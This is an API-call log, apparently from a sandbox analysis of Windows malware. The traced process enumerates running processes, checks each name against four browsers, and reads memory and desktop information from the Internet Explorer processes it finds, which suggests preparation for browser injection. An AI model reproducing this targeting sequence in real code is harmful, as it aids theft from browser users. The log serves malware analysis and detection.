	[0242.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x8968
	[0242.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.463] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0242.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.463] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.464] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0242.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.464] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.464] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0242.465] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x896c
	[0242.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.465] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0242.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.465] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.466] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0242.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.466] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.466] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0242.467] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x8970
	[0242.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.467] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0242.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.468] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.468] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0242.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.468] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.468] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0242.469] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x8974
	[0242.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.469] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0242.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.470] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.470] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0242.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.471] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.472] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0242.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x8978
	[0242.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.472] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0242.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.473] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.473] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0242.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.473] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.473] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0242.474] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x897c
	[0242.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.474] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0242.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.475] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.475] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0242.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.476] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.476] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0242.477] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x8980
	[0242.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.477] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0242.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.477] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.478] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0242.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.478] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.479] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0242.480] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x8984
	[0242.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.480] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0242.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.480] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.480] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0242.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.480] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0242.481] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x8988
	[0242.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.482] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0242.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.482] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.482] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0242.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.482] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.483] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0242.483] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x898c
	[0242.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.483] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0242.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.484] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.484] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0242.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.485] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.485] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0242.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x8990
	[0242.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.486] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0242.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.487] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.495] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0242.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.496] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.496] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0242.497] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x8994
	[0242.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.497] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0242.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.498] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.498] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0242.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.499] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.499] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0242.500] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x8998
	[0242.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.500] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0242.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.501] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.501] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0242.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.502] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.503] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0242.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x899c
	[0242.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.503] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0242.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.504] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.504] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0242.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.505] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.505] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0242.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x89a0
	[0242.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.506] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0242.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.506] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0242.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.507] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0242.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.507] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.507] NtQueryInformationProcess (in: ProcessHandle=0x89a0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0242.507] ReadProcessMemory (in: hProcess=0x89a0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0242.508] ReadProcessMemory (in: hProcess=0x89a0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0242.508] ReadProcessMemory (in: hProcess=0x89a0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0242.508] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0242.508] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0242.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x89a4
	[0242.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.509] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0242.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.509] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0242.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.509] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0242.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.510] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.510] NtQueryInformationProcess (in: ProcessHandle=0x89a4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0242.510] ReadProcessMemory (in: hProcess=0x89a4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0242.510] ReadProcessMemory (in: hProcess=0x89a4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0242.510] ReadProcessMemory (in: hProcess=0x89a4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0242.510] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0242.511] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0242.511] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x89a8
	[0242.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.511] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0242.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.512] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.512] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0242.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.512] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.513] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0242.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x89ac
	[0242.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.513] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0242.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.514] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.514] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0242.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.515] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.515] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x89b0
	[0242.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.516] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.516] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.516] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.517] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.517] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.518] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.518] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x89b4
	[0242.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.518] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.519] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.519] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.519] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.520] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.520] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x89b8
	[0242.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.521] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.521] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.521] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.522] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.522] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0242.523] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x89bc
	[0242.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.523] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0242.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.523] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.524] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0242.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.524] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.524] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.525] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x89c0
	[0242.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.525] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.525] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
